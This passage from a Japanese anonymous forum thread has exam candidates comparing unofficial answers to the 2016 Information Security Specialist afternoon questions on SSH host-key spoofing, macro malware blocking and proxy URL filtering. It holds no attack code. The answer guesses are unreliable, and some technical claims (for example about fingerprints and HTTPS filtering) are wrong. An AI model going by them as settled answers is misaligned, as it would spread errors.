(4)鍵交換の際に、クラウドサービスや携帯電話網での通信を盗聴し、鍵を入手する
・問3
1:a.エ
2:(1)b.ウ c.ウ
(2)プログラム名やソースコードが変化していく攻撃用プログラム
3:(1)全ての送信元PCのIPアドレスがプロキシ1のものに変わるから
(2)d.ウ
4:(1)正当な利用者のセッション情報を盗み、正当な利用者IDとパスワードを用いて認証を成功させる
(2)業務に必要かつ安全であることを確認したURLをホワイトリストに設定し、許可する
業務に不要と思われるカテゴリを「遮断」に設定する
142 :
名無し検定1級さん
2016/10/18(火) 21:52:01.24 ID:SpbV46xY
143 :
名無し検定1級さん
2016/10/18(火) 21:52:30.18 ID:suB+iTBL
そもそも、「組込み機器になりすます中間者攻撃」ってどういう意味?
144 :
名無し検定1級さん
2016/10/18(火) 21:52:35.68 ID:P5VN1qTo
>>140 それは検知・識別する手段の話であって防止策は別だろ
145 :
名無し検定1級さん
2016/10/18(火) 21:53:08.03 ID:Opdnxm/W
問3-2-2って
変化するウイルスなんて正解になるんか?
「登録されてい?」が停止の鍵だから、
登録されてないウイルス
だと思ってたんだが。
146 :
名無し検定1級さん
2016/10/18(火) 21:54:01.44 ID:OUaAkN/N
>>140 Linuxならコマンドの実態は実行ファイルだから
ハッシュで止められるんじゃない?
147 :
名無し検定1級さん
2016/10/18(火) 21:54:42.12 ID:I9xZzz5x
>>137 俺も同じ解答だった、、、
間違いではないと思うんだけどなぁー
148 :
名無し検定1級さん
2016/10/18(火) 21:56:02.83 ID:Qjr9CjvL
149 :
(*´∀`)情弱士
2016/10/18(火) 21:56:13.97 ID:/zmUp4BN
(゚ω゚)50点くらいで落ちたように思える。。
2016年 情報セキュリティスペシャリスト試験の自分なりの解答 update3
をgoogle検索してね。
150 :
名無し検定1級さん
2016/10/18(火) 21:56:22.21 ID:hymjaC55
>>144 問3の設問2(1)の話をしてるんじゃないの?
もろにプログラム起動禁止設定の話と思うから下の2つの方式しかないと思うのだけど...
・プログラム名
・プログラムの実行ファイルのハッシュ値
検知・識別とか防止策とかどこに書いてある言葉?
151 :
名無し検定1級さん
2016/10/18(火) 21:57:58.64 ID:bDQXzqH0
152 :
(*´∀`)情弱士
2016/10/18(火) 22:00:38.96 ID:/zmUp4BN
>>140 psコマンドとkillコマンドを組み合わせたら、プロセスは何でも止まるけど、
実行ユーザーがrootである必要がある。
153 :
名無し検定1級さん
2016/10/18(火) 22:01:04.49 ID:fNniDNi/
組込み機器になりすます←わかる
中間者攻撃←わかる
組込み機器になりすます中間者攻撃←んなもんねーよ
154 :
名無し検定1級さん
2016/10/18(火) 22:01:38.33 ID:bDQXzqH0
>>137 ホストキーってフィンガープリントのことだからログイン時に同じ指紋を持ってるかどうか(なりすましてないか)の確認にしか使わないよ
ログイン時に使うのはユーザのキーな
155 :
名無し検定1級さん
2016/10/18(火) 22:03:33.30 ID:LK1u66oJ
プログラムの実行ファイルのハッシュ値が一致した場合に禁止する方式があるって本文に書いてあるから、マルウェアZ(のマクロが実装された文書ファイルのハッシュ値)をプログラム起動禁止設定すればいいんじゃない
156 :
名無し検定1級さん
2016/10/18(火) 22:04:53.90 ID:r0WOVMJc
>>125 取り替えられる手段があれば当然止めるべき。
が、それは回答とはあまり関係しないよね。
この問題の設定状況下では、マルウェアが止まられるかどうかは
不確定(正しく等は明記されていない)であり、設定可否がいつかはっきりするかもわからない。
そのときどれを止めますか?という問いかけ。
スペシャリストなんだから、状況から適切に事実を見抜いて、
まずできる対策を見抜ける必要があるのではないかな。
157 :
名無し検定1級さん
2016/10/18(火) 22:05:28.29 ID:OUaAkN/N
158 :
名無し検定1級さん
2016/10/18(火) 22:06:04.67 ID:WYEd278a
午後1甘め採点でも50点くらいだわ
お前ら来年もよろしく
159 :
(*´∀`)情弱士
2016/10/18(火) 22:06:28.24 ID:/zmUp4BN
>>154 フィンガープリントは、ユーザーが紙で貰って、接続先サーバーを間違えないようするためのチョット長いパスワードです。
160 :
名無し検定1級さん
2016/10/18(火) 22:07:34.00 ID:cCdMk8pp
>>145 いずれも正解でいいんじゃね?
・マルウェアZが初回とは違う(全く別の)攻撃用プログラムをダウンロードした場合
・攻撃用プログラムが自分の亜種を作るポリモーフィック型ウイルスである場合
(マルウェアZから落とされる時点ですでに自己改変している前提)
161 :
名無し検定1級さん
2016/10/18(火) 22:08:13.25 ID:nu7tlc8p
>>139 ありがとうジャスト60点だった
おえええええ
162 :
名無し検定1級さん
2016/10/18(火) 22:08:48.01 ID:Opdnxm/W
>>155 マクロが実装された文書ファイルの場合、マクロ部分と文書本体は別ファイルになってる(拡張子をzipとかに変えたあと、解凍すると別のファイルに分かれる)し、
実際マクロ部分だけを検査するソフトはあるから、検知自体は可能だよ。
その手のソフトは、マクロ部分だけを消去してくれるし。
163 :
(*´∀`)情弱士
2016/10/18(火) 22:09:35.66 ID:/zmUp4BN
午前Uの88点の28点を午後Tへ貰えないだろうか?
164 :
名無し検定1級さん
2016/10/18(火) 22:11:52.95 ID:uu+kYduC
最初におっぱいを果実と表した人は素晴らしい
165 :
名無し検定1級さん
2016/10/18(火) 22:11:55.67 ID:bDQXzqH0
>>159 髪でもらうってなんの話や?別にパスワードでもないし、なんかと間違えてない?linuxでsshしたことある?
166 :
名無し検定1級さん
2016/10/18(火) 22:12:10.29 ID:uu+kYduC
誤爆
167 :
名無し検定1級さん
2016/10/18(火) 22:13:43.25 ID:bhgEXwnD
午後T甘め採点で40行ったわ。こりゃ合格行ったかな。
168 :
名無し検定1級さん
2016/10/18(火) 22:15:12.80 ID:bhgEXwnD
なんだかんだで文字埋めてれば得点くれるんだよな?無茶苦茶なこと書いてたけど。IPAさん普段はツンツンしてるけど、やってくれるんだろ?
169 :
名無し検定1級さん
2016/10/18(火) 22:16:17.74 ID:OUaAkN/N
170 :
名無し検定1級さん
2016/10/18(火) 22:21:32.14 ID:Opdnxm/W
この試験は部分点とか出やすいん?
応用からの移行組だけど、応用の配点は相当甘く感じた。
171 :
名無し検定1級さん
2016/10/18(火) 22:22:18.76 ID:P5VN1qTo
IPA言語をいくら理解しようとしても人類には無理だ
172 :
名無し検定1級さん
2016/10/18(火) 22:26:50.31 ID:PpRVZfcZ
昨年のネスペも自己採用より10点以上高かったし、
午後1は甘いかもね
問題の難易度はやや易化してると感じたど、
回答バラけてるし平均点は高くなさそう
173 :
名無し検定1級さん
2016/10/18(火) 22:27:40.01 ID:kGrT1KZO
これでIPAの講評で「問題文をよく読み落ち着いて回答して欲しい」って書いてあったらもう笑いを通り越してあきれるわ
174 :
名無し検定1級さん
2016/10/18(火) 22:28:11.35 ID:qEfLorjw
正答率が高い問だと部分点が低いというか貰えないような気がする
175 :
名無し検定1級さん
2016/10/18(火) 22:29:14.29 ID:qEfLorjw
午後2問2設問5(3)のj、kって正解何なんだろうなぁ
改めて読んでみても全く分からない
176 :
名無し検定1級さん
2016/10/18(火) 22:30:42.56 ID:PpRVZfcZ
>>175 その問題は考えても無駄だから忘れたほうがいい
177 :
名無し検定1級さん
2016/10/18(火) 22:32:51.28 ID:AQe03RlP
178 :
名無し検定1級さん
2016/10/18(火) 22:40:16.44 ID:PpRVZfcZ
>>177 厳しめで45点、普通で50点くらいじゃない?問1が厳しい
午後1マジックに期待
179 :
名無し検定1級さん
2016/10/18(火) 22:43:52.73 ID:c8ZZKTd5
マルウェアZを禁止起動設定にするかしないかを判定させるには、問題文でマルウェアの中身か禁止起動設定の情報が少なくない?
実務の発想からしたら、まずは禁止起動設定に適用させる事を考えるでしょ。
180 :
(*´∀`)情弱士
2016/10/18(火) 22:46:11.05 ID:/zmUp4BN
>>127 マルウェアZはマクロ。マクロを無効にしたら実行しないでしょ。
181 :
名無し検定1級さん
2016/10/18(火) 22:48:06.26 ID:OUaAkN/N
>>180 それって止めたのはマルウェアじゃなくてマクロ機能だよね
あと、問題文ではプログラム名かハッシュで禁止するとしか書いてないから、マクロ機能を停止するのは妄想だよね
182 :
名無し検定1級さん
2016/10/18(火) 22:51:07.95 ID:Wy/fbTVw
午後1問3の設問2(1)物議は
「マルウェアZは、文書ファイルのマクロとして実装されていた。」の一文から
イ、オになるんではなかろうか。
文書ファイルなのでプログラム(exeファイル)ではないから、プログラム起動禁止設定は使えないという…。
とかいう自分も「ウ、カ」と書いてしまったわけだが…
183 :
名無し検定1級さん
2016/10/18(火) 22:51:09.87 ID:jgpCgpIv
領域あふれを検出できるランタイムライブラリ・・、なんか書けんわw
184 :
名無し検定1級さん
2016/10/18(火) 22:52:55.47 ID:HILqweor
ウカウカウカ
185 :
名無し検定1級さん
2016/10/18(火) 22:53:38.31 ID:Opdnxm/W
マクロ機能は本文とは別個体だからハッシュ値は求められるな。
止めるって言葉の意味がわからないが、マクロを含む文書を取り扱うアプリの起動時に、マクロの使用を止めるって意味なら可能じゃない?
186 :
(*´∀`)情弱士
2016/10/18(火) 22:53:55.23 ID:/zmUp4BN
187 :
名無し検定1級さん
2016/10/18(火) 22:56:09.57 ID:HILqweor
てか、ウカ外したら、8点くらい減点だよね??
際どい…
こんなシビア過ぎる問題で死ぬなんて
188 :
名無し検定1級さん
2016/10/18(火) 22:57:47.86 ID:qEfLorjw
>>186 マルウェアZは文書ファイルのマクロだから起動禁止設定には出来なくない?
問題文で書かれている起動禁止設定は
1. プログラム名が一致した場合
2. プログラムの実行ファイルのハッシュ値が一致した場合
と書いてあって、文書ファイルはそもそもプログラムじゃないし
189 :
名無し検定1級さん
2016/10/18(火) 22:59:17.12 ID:mdyU3r0y
powershell.exe止めるんだろ。
190 :
名無し検定1級さん
2016/10/18(火) 23:00:33.93 ID:qEfLorjw
powershell.exeはマルウェアZじゃないじゃん?
191 :
(*´∀`)情弱士
2016/10/18(火) 23:02:32.24 ID:/zmUp4BN
>>190 マルウェアZがドロッパーと呼ばれる爆弾投下プログラムだと思って読んでたけど(*´∀`)
192 :
名無し検定1級さん
2016/10/18(火) 23:03:46.94 ID:xrGvNUxu
193 :
名無し検定1級さん
2016/10/18(火) 23:05:11.27 ID:Opdnxm/W
自己採点は怪しいものを半分にして60点
死んだかなー
194 :
(*´∀`)情弱士
2016/10/18(火) 23:05:38.15 ID:/zmUp4BN
>>188 WordやExcelのマクロを走らないようにする設定あるよ。
ツール→マクロ→セキュリティって選んでいくと・・。
195 :
名無し検定1級さん
2016/10/18(火) 23:06:53.66 ID:PUwJbccD
>>186 問題とは関係ないけどマクロの起動とマクロからの外部プログラム呼び出しが可能な時点でアウトだよ、PowerShell関係ない
196 :
名無し検定1級さん
2016/10/18(火) 23:07:03.25 ID:HILqweor
こんなに曖昧な問題なのに
半年も問題作成してるんだよね?
197 :
(*´∀`)情弱士
2016/10/18(火) 23:08:17.08 ID:/zmUp4BN
もしかして、今の若い衆は、マクロウイルスがあるから無効にしろ。っていう時代があったことを知らんのか?
2000年〜2004年くらいの話だけど。
198 :
名無し検定1級さん
2016/10/18(火) 23:08:37.46 ID:2Rx1qmaT
ウカなら自己採点60点ジャストや…頼む…
199 :
名無し検定1級さん
2016/10/18(火) 23:08:42.35 ID:xrGvNUxu
リターンアドレスのとこ
呼び出し元のアドレスて書いたんだけど
部分点貰えへんのか?
200 :
名無し検定1級さん
2016/10/18(火) 23:10:53.87 ID:qEfLorjw
>>194 確かにワードやエクセルにはマクロ禁止の設定はあるけど、
今回の試験で記述されている「プログラム起動禁止設定」の方法ではないじゃん?
201 :
名無し検定1級さん
2016/10/18(火) 23:12:08.45 ID:6EaOwzeQ
itecの解答例問3設問4の(1)は答えになってなくないか…?
IDとパスワードを読み取る方法が問題だと思うんだが…
202 :
名無し検定1級さん
2016/10/18(火) 23:12:41.57 ID:bhgEXwnD
だいたいさあ、びしびし採点して来月初めには公表してくれよ。2ヶ月って結構だぜ。
203 :
名無し検定1級さん
2016/10/18(火) 23:14:00.82 ID:HILqweor
アイテックみたいな資格の仕事してるような人でもこの問題は解けないってことだなw
多分社内で議論した上での解答だろうにw
204 :
名無し検定1級さん
2016/10/18(火) 23:16:12.49 ID:ZEmrT2TD
itecがガバガバすぎて絶望も安心も出来ねー
とりあえず60点は確保したけど後は上がるだけだよな?うん
205 :
名無し検定1級さん
2016/10/18(火) 23:16:35.45 ID:PUwJbccD
>>197 ん、俺に言った?
俺は単にリンク先のURLがPowerShellの脆弱性を突いたかのような書き方だから、PowerShell関係ないやんって言っただけよ
206 :
(*´∀`)第一種情弱士
2016/10/18(火) 23:16:41.69 ID:/zmUp4BN
>>199 A関数からB関数を呼び出した場合は、「呼び出し元のアドレス」ではA関数のポインタを意味するから不正解。
戻り先アドレス、戻りアドレス、リターンアドレスが正解。
207 :
名無し検定1級さん
2016/10/18(火) 23:17:22.12 ID:P5VN1qTo
>>196 業界の風習にならうと、期限があるうちはまだ大丈夫と放っておいて
デッドラインを超えたあたりで重い腰を上げるから、2ヶ月ぐらいじゃなかろうか
208 :
名無し検定1級さん
2016/10/18(火) 23:28:50.45 ID:Opdnxm/W
>>197 マクロウイルスは近年も話題になってるよ
ソースは情報セキュリティ白書とトレンドマイクロやシマンテックのレポート
209 :
名無し検定1級さん
2016/10/18(火) 23:34:52.75 ID:suB+iTBL
アイテックが悪いんじゃなくて、問題が悪問すぎんだよ
210 :
(*´∀`)情弱士
2016/10/18(火) 23:36:48.51 ID:/zmUp4BN
>>203 itec回答は、
URLフィルタリングするのにhttpsかhttpかは重要なのを考慮してない。
URLフィルタリング : HTTPS以外のURLを設定する
カテゴリ単位フィルタリング: HTTPSのURLを設定する
(゚ω゚)40字もあるんだから、この事は書けるハズ・・・。
211 :
名無し検定1級さん
2016/10/18(火) 23:38:48.70 ID:+0b5HaT2
午後1
問2 1 a,ア b,イ c,ウ d,エ
2 (1)戻り先のアドレス (2) sample1,sample2
3 (1)ウ (2)23 (3) アイエオ
4 なんか書いたけど問題用紙に書いてない
問3 1 え
2 (1) b,ウ c,カ (2)未知の攻撃用プログラム
3 (1) プロキシ1とインターネット間の通信をプロキシ2が経由するため
(2) オ
4 (1) キーロガーなどによりIDとパスワードを盗み取りそれを利用して認証する
(2) URL:業務に必要かつ安全であることを確認したURLをホワイトリストに追加する
カテゴリ:検知に設定していた業務に不要と思われるカテゴリは全て遮断に設定する
どうですかね?
212 :
名無し検定1級さん
2016/10/18(火) 23:39:29.15 ID:KqGMK2LA
ダメだ
同一モデルの同じホスト鍵を悪用して組込み機器になりすまして中間者攻撃というのがどうしてもイメージできない
213 :
名無し検定1級さん
2016/10/18(火) 23:41:01.30 ID:Wy/fbTVw
>>210 httpsかhttpかは重要ではない気が…
重要なのは、社員に見せたくない内容のホームページを見せないように設定すること。
いくら、httpsでもアダルトサイトは見せちゃダメでしょ
214 :
名無し検定1級さん
2016/10/18(火) 23:42:31.83 ID:P5VN1qTo
>>212 鍵が漏れてるからその鍵を別の悪い機器に組み込んで成りすまして悪事とか
その鍵を使ってオレオレ証明書に署名して信頼できる物扱いさせて悪事って感じかね
215 :
名無し検定1級さん
2016/10/18(火) 23:43:23.29 ID:Fp6M418K
アイテック毎回当ててる感じなの?
216 :
名無し検定1級さん
2016/10/18(火) 23:44:38.76 ID:I9xZzz5x
217 :
名無し検定1級さん
2016/10/18(火) 23:46:19.95 ID:KqGMK2LA
>>214 なるほど他の機器に組み込むって発想がなかった
でもホスト鍵で署名なんてできるの?
上のほうでホスト鍵はフィンガプリントのことって書いてあったけど
218 :
名無し検定1級さん
2016/10/18(火) 23:46:24.01 ID:kwEfEEhQ
>>210 ここでsslは無関係でしょ
認証局がガバガバならhttpsだろうと悪質サイトである可能性あるし、そもそも通信の暗号化とこの問題は関係ないし
それにカテゴリはカテゴリ単位であってurl単位でフィルタリングするものじゃないからプロトコルで制御はできないよ
219 :
(*´∀`)情弱士
2016/10/18(火) 23:47:40.00 ID:/zmUp4BN
>>213 https://hoge.com/sigoto をURLフィルタリングするとができない。
https://hoge.com/game をURLフィルタリングするとはできない。
https://hoge.com だとURLフィルだリングできる。
220 :
名無し検定1級さん
2016/10/18(火) 23:47:43.52 ID:fNniDNi/
秘密鍵が漏洩した時の影響は
(1)暗号化された通信の暴露
→SSHサーバ・クライアント間の通信内容を復号されて傍受
(2)サーバのなりすまし
→SSHサーバに接続したら偽物だった
(1)と(2)を同時に行うことをイメージしろというのは無理
221 :
名無し検定1級さん
2016/10/18(火) 23:47:48.09 ID:Opdnxm/W
応用の時は結構当たってた印象があるけど
高度はどうなん?
てか、一部の問題は明らかに本文を無視してる気がして…。
222 :
(*´∀`)情弱士
2016/10/18(火) 23:48:55.91 ID:/zmUp4BN
>>219訂正
>>213 https://hoge.com/sigoto はURLフィルタリングが出来ない。
https://hoge.com/game はURLフィルタリングが出来ない。
https://hoge.com は、URLフィルだリングできる。
223 :
名無し検定1級さん
2016/10/18(火) 23:49:51.19 ID:2shNBcdd
アイテックベースの自己採点は±20ブレる。
去年のNW午後は自己採点で両方50点台だったけど受かってたよ。
224 :
名無し検定1級さん
2016/10/18(火) 23:50:03.53 ID:iiaDuGvk
SC最終回記念で全員に加点よろしく
225 :
名無し検定1級さん
2016/10/18(火) 23:50:10.60 ID:Opdnxm/W
>>217 それ、機器を使わずにふつうにアクセスすりゃ良くね?と思ったのは俺だけだろうか。
要するに、鍵を使えば接続を確立し放題なのが問題なわけだし。
226 :
名無し検定1級さん
2016/10/18(火) 23:52:00.01 ID:fNniDNi/
ちなみに私は「(2)サーバのなりすまし」しか思いつかなかったので部分点ください(泣)
227 :
名無し検定1級さん
2016/10/18(火) 23:52:54.90 ID:yJX7rWoO
基本的に自己採点はブレるよなぁ
去年SC受けたけど自己採点67点が52点になったわ
未だに原因が分からない
228 :
名無し検定1級さん
2016/10/18(火) 23:53:53.40 ID:Wy/fbTVw
>>222 「https://hoge.com/sigoto」
↑これは立派なURLなので、ブラックリストやホワイトリストに登録できますよ(^^)/
229 :
(*´∀`)情弱士
2016/10/18(火) 23:56:43.05 ID:/zmUp4BN
230 :
名無し検定1級さん
2016/10/18(火) 23:59:06.42 ID:2shNBcdd
情弱士さまは丁重にNGに入れてアンカも打たない方がいいと思うよ
通院中の身とのこと
231 :
名無し検定1級さん
2016/10/19(水) 00:00:15.35 ID:0rh15364
>>228 問題文の前提を踏まえてないからバツじゃね?
あくまでも、ジャンルでフィルタリングをすると業務に支障が出るから、ひと月監視を行って対応した内容は何かと聞いてるんだから。
232 :
名無し検定1級さん
2016/10/19(水) 00:00:18.98 ID:MjITTr8T
233 :
名無し検定1級さん
2016/10/19(水) 00:02:06.20 ID:p4xn5WPs
sshサーバに初めてアクセスするとクライアント側にサーバの公開鍵が登録されるんよ
そこでサーバの秘密とクライアントの公開鍵ペアが登録されるわけ
それ以降はsshサーバに接続するたびに公開と秘密がペアか検証されて、異なると警告がでる
今回はここの秘密鍵が複数存在するから、同じ秘密鍵を持つ第三者が、私がlteです、って言っても嘘がばれない
つまりクライアントがlteだと思ってた相手が実は第三者のなりすましな可能性があるってこと
署名とか証明書の話ではなくてフィンガープリントによる本人確認ができないってのがこの問題
234 :
名無し検定1級さん
2016/10/19(水) 00:03:23.38 ID:Gai3Yx9s
httpかhttpsかは重要だけど、そこが問題だとするなら、
1か月も放置せずにフェーズ2開始時点でそうしてるはず。
設問の趣旨とは関係ない。
235 :
名無し検定1級さん
2016/10/19(水) 00:04:15.55 ID:JDIgdi1s
236 :
名無し検定1級さん
2016/10/19(水) 00:04:47.21 ID:PAmkkiVr
自己採点
午前1 60点 午前2 76点
午後1 66点 午後2 71点
こう見ると午前1字分が丸したの間違えてなければ受かってそう
237 :
名無し検定1級さん
2016/10/19(水) 00:05:18.19 ID:qT5H93Ac
URLフィルタ単体だとhttpsは暗号化されてるからドメイン単位でしかフィルタできないよ
Yahooトップはアクセス不可能だけどYahooニュースの記事に直接行くとアクセス可能みたいな感じ
だから最近のURLフィルタの機器はSSLデコード機能がついてる
238 :
(*´∀`)情弱士
2016/10/19(水) 00:06:01.11 ID:f2/TZgVF
239 :
名無し検定1級さん
2016/10/19(水) 00:06:24.76 ID:JDIgdi1s
午後1,2の採点あるけど、どっか配点予想してんの?
240 :
名無し検定1級さん
2016/10/19(水) 00:07:48.88 ID:Gai3Yx9s
SSL/TLS使うとURLフィルタできないってのは前回の春の問題でも出てるんだが、やってないのかな?
やろうとするなら、プロキシ側で一旦復号する機能のあるやつ使わないとできない。
241 :
名無し検定1級さん
2016/10/19(水) 00:10:15.08 ID:OSKr1V/C
午後問題って結局後半の設問が当たってるかどうかだよな
242 :
名無し検定1級さん
2016/10/19(水) 00:18:39.20 ID:p4xn5WPs
wafはsslアクセラレータあればhttpsだろうと関係ない
特に述べられていないから付いてるんだろうよ
てかこの問題の意図はそこじゃないのに何故そこに拘るのか不思議でしょうがない
243 :
名無し検定1級さん
2016/10/19(水) 00:21:29.63 ID:0rh15364
IPA試験の解き方は、「問題文に書かれてないことは無視する」に尽きる気がする。
だから、
https://云々は明らかに質問の趣旨を無視した解答でバツが付くんじゃね?
244 :
名無し検定1級さん
2016/10/19(水) 00:30:50.51 ID:d8m8qUls
おっさんの言うことまともに取り合うのやめようぜ
245 :
名無し検定1級さん
2016/10/19(水) 00:31:24.56 ID:XxHt8oh9
応用情弱技術者
246 :
(*´∀`)情弱士
2016/10/19(水) 00:33:37.16 ID:f2/TZgVF
午前T問3設問4は、
遮断はブラックリストに設定し、
許可したURLはホワイトリストに設定だったとすれば、どうなる?
247 :
名無し検定1級さん
2016/10/19(水) 00:34:29.95 ID:0rh15364
そうだな。
てか、問1の設問3の2が中間者攻撃になる根拠がわからないんだけど、
わかる人がいたら教えて。
ふつうに不正アクセスしちゃまずいの?
248 :
(*´∀`)情弱士
2016/10/19(水) 00:37:25.76 ID:f2/TZgVF
>>246 ログが残って確認ができるカテゴリ単位は検証用とし、検証が終わったら空になるのが正解かもな。
249 :
(*´∀`)情弱士
2016/10/19(水) 00:42:10.78 ID:f2/TZgVF
URLフィルタリング : ホワイトリストを許可URL、ブラックリストを遮断URLを設定する。
カテゴリ単位フィルタリング: ログによる調査が終わったら、URLフィルタリングへURLを反映する。
これが正解だろ?
250 :
名無し検定1級さん
2016/10/19(水) 00:44:30.68 ID:d8m8qUls
>>247 あなたがログインしようしてるサーバが、いつのまにか攻撃者のサーバにすり替わっているのが問題
不正アクセスは能動的な攻撃で、なりすましは受動的(待ち伏せている)ので、反対ともいえる
すり替わったサーバが、通信を正規のホストに中継していれば第三者攻撃だし、ログイン時のパスワードだけ抜き取ってるかもしれない
第三者攻撃に限定している解答はイマイチだと個人的には思う
251 :
名無し検定1級さん
2016/10/19(水) 00:44:34.12 ID:zxoJFYat
>ホワイトリストを許可URL、ブラックリストを遮断URLを設定する。
用語の説明にしかなっていない
252 :
名無し検定1級さん
2016/10/19(水) 00:45:15.69 ID:GpRdohTt
>>249 よく分かってないんだけどカテゴリで遮断しとけばいいものもわざわざ手間かけてブラックリストに登録するものなの?
253 :
(*´∀`)情弱士
2016/10/19(水) 00:47:29.32 ID:f2/TZgVF
>>251 これでどうだ?
URLフィルタリング : ホワイトリストには許可URL、ブラックリストには遮断URLを設定する。
カテゴリ単位フィルタリング: URL分類後に、URLフィルタリングへURLを反映し、URLは削除する。
254 :
名無し検定1級さん
2016/10/19(水) 00:49:41.99 ID:0rh15364
>>250 ありがとう。
問3のマルウェアの問題といい、微妙な解答が多いわな。
あと、問1の最終問題が今ひとつ納得できないんだが、
あれは何が根拠になるんだ?
255 :
(*´∀`)情弱士
2016/10/19(水) 00:50:01.88 ID:f2/TZgVF
>>252 ログは重たい処理だから、軽くなるかもなぁ・・・。
256 :
名無し検定1級さん
2016/10/19(水) 00:50:23.08 ID:OKo5TNVI
>>253 カテゴリ単位フィルタリングの解答に、URLフィルタリングにURLを反映する説明してるのはおかしいと思うよ
257 :
名無し検定1級さん
2016/10/19(水) 00:50:34.86 ID:oJHdDQ/e
>>249 >>26年前に情報1種を取った俺が
>URLフィルタリング : ホワイトリストを許可URL、ブラックリストを遮断URLを設定する。
>カテゴリ単位フィルタリング: ログによる調査が終わったら、URLフィルタリングへURLを反映する。
>これが正解だろ?
・・・おっつぁん
なんてこった・・・あの稲妻みてえなジャブが・・こんなんなっちまって・・・
こんな見る影もねえほどボロボロによ・・・(つд∩)
258 :
sage
2016/10/19(水) 00:50:37.70 ID:/LERWDoz
ホワイトリストとブラックリストって両方設定することもあるのですか?
259 :
名無し検定1級さん
2016/10/19(水) 00:52:14.14 ID:82f1YsHL
URLフィルタリング:
業務に不要で安全でないURLをブラックリストに設定する
カテゴリ単位フィルタリング:
業務に必要かつ安全なURLを許可に設定する
これだとどうですかね?
部分点もらえますかね?
260 :
名無し検定1級さん
2016/10/19(水) 00:53:05.35 ID:0rh15364
>>259 されない。
問題文の仕様には必要ないカテゴリは遮断すると書いてある
261 :
名無し検定1級さん
2016/10/19(水) 00:54:28.90 ID:N3PECrpv
午後の書き問題のとこってどうやって採点してるんだろ。
アルバイトがしてるなら、キーワードが入ってて、それなりの長さで書いてたら丸にならんかな。
それとも、ちゃんとエロい人が採点してるのかな。
262 :
名無し検定1級さん
2016/10/19(水) 00:55:39.46 ID:zxoJFYat
普通はデフォで全遮断だよな
申請あったものを順次ホワイトリスト入りさせていく
263 :
名無し検定1級さん
2016/10/19(水) 00:56:24.11 ID:0rh15364
>>261 試験問題の作成委員は300人以上いるけど、採点者はどうしてるんだろうね。
採点基準が漏れないところを見る限り、作成者と同じ縛りがかかってるみたいだし。
264 :
名無し検定1級さん
2016/10/19(水) 00:59:05.53 ID:Gai3Yx9s
初めにサンプリングで解答集めて、偉い人たちが何をどこまで書いてあったら正答とするか厳密に決めた後、
バイトが機械的に採点してくんでない?
265 :
名無し検定1級さん
2016/10/19(水) 01:00:03.69 ID:OSKr1V/C
これ採点講評で
「マクロは文書ファイルに感染するため起動を禁止できない事を読み取って欲しかった。問題をよく読んで欲しい。」
とか書かれるのか
マジかよ
266 :
名無し検定1級さん
2016/10/19(水) 01:01:57.85 ID:0rh15364
>>264 流石にそれはないだろ。
得点調整とか配点操作はあると思うけど。
267 :
(*´∀`)情弱士
2016/10/19(水) 01:05:15.12 ID:f2/TZgVF
>>262 そうだ。
URLフィルタリング : ホワイトリストには許可するURLを設定し、ブラックリストは空に設定。
カテゴリ単位フィルタリング: 許可するURLはURLフィルタリングに反映し、そのURLは削除。
268 :
名無し検定1級さん
2016/10/19(水) 01:06:11.22 ID:d8m8qUls
>>254 謎。これもなかなかの悪問だと思う
鍵がどこにどういう形で保存するのか書いてないから、答えも分からない
プログラムに組み込まれてるなら解析して取り出すだろうし、テキストファイルで置いてあるならサーバへの不正侵入だろうし、毎回転送するから鍵配送時に通信を盗聴するだろうし
過去問で「スマホアプリに共通の鍵を埋め込むのはなぜ危険か」ってあって、それはアプリを解析して取り出せるからって分かるけど、今回の問題は・・・。
まぁ、こういう問題もあるさ
269 :
名無し検定1級さん
2016/10/19(水) 01:06:48.00 ID:zxoJFYat
>>264 表記揺れだらけだから統一基準設けられないだろ
270 :
名無し検定1級さん
2016/10/19(水) 01:12:31.53 ID:6rnTMQO/
>>258 機器によるけど普通はできて優先順位をつける。
実在はともかく、本問では12ページ〜13ページにまたがる文を読むとできるという想定らしいよ。
271 :
名無し検定1級さん
2016/10/19(水) 01:12:36.39 ID:0rh15364
>>269 国立大の試験だと、加点するキーワードや内容と減点する内容を決めて、それをもとに採点するはず。
予備校もそれに準拠してるしね。
資格試験はわからん。
272 :
(*´∀`)情弱士
2016/10/19(水) 01:18:24.35 ID:f2/TZgVF
>>252 itec回答だと、プロキシベンダ作成のURLリストの影響を受ける(12ページの下辺り。)
自社のホワイトリストだと判断されたら、ホワイトリストの転記すべき。
273 :
名無し検定1級さん
2016/10/19(水) 01:24:55.33 ID:KFQGJsb2
>>60 ファームウェアが暗号化されるのは配信経路だけ。ROM上では通常暗号化しない(TPMとかあれば別)
>>268 暗号化されたイメージを解凍する処理はLTE機器が行うから、その内部に復号用の情報を持たざるを得ない
物理的に隔離されたサーバ類と、ネジあければ全部丸見えの組込み機器とでは前提が全く違うのよ
>>233 前半ちょっと違うと思う
問題文のホスト鍵(フィンガプリント)と、公開鍵認証で用いる公開/秘密鍵は全く関係ない
たとえば、パスワード認証だろうと認証一切無しだろうとホスト鍵チェックは行える
ホスト鍵はそのサーバしかもっていない情報(実際にはこれが公開鍵だからややこしいけど)の
ハッシュ値に過ぎなくて、接続の度にサーバから渡されるハッシュ値が初回と同じか(偽装されてないか)
比較してるだけ
ファームウェアから取り出す点にしても、中間者攻撃にしても、その辺の実務経験あればすぐに気づけるよ
そういう意味では十分良問だと思う
274 :
名無し検定1級さん
2016/10/19(水) 01:25:25.01 ID:nrM9pnX9
簡単な問題は逆下駄あるから注意した方が良いぞ
今回なら午後2問1が簡単だったらしいから正答率高くないと厳しいと思う
275 :
名無し検定1級さん
2016/10/19(水) 01:27:41.31 ID:1Gf7znoq
試験当時に考えたこと
ルータの鍵はルータのファイルシステムの中にあるだろう(携帯だと特別なメモリに入っている可能性もあるが)
ルータが動作中であればファイルシステムが展開されているであろう
ルータならファームウエア内のサーバプログラムがあまり更新されておらず、脆弱性があるものが使われているだろう
↓
脆弱性をついてファイルシステム内を探れば鍵が見つかるかもなー
問題作成者は別の考えかもしれないのですが、考えるヒントとして書いてみました。
276 :
(*´∀`)情弱士
2016/10/19(水) 01:30:53.53 ID:f2/TZgVF
>>272 日本語変だなw
自社のホワイトリストだと判断されたら、ホワイトリストへURLを転記しても良いし、
カテゴリ単位のほうは自動更新って書いてないから、「許可」にするだけのitec回答でも正解かな。
277 :
名無し検定1級さん
2016/10/19(水) 01:33:49.51 ID:KFQGJsb2
>>35の回答速報みたけど、
問1設問2(2)の“PKIに基づく”公開鍵認証方式っていうのはおかしいね
SSHはPKI何にも関係ない、ただの公開鍵認証
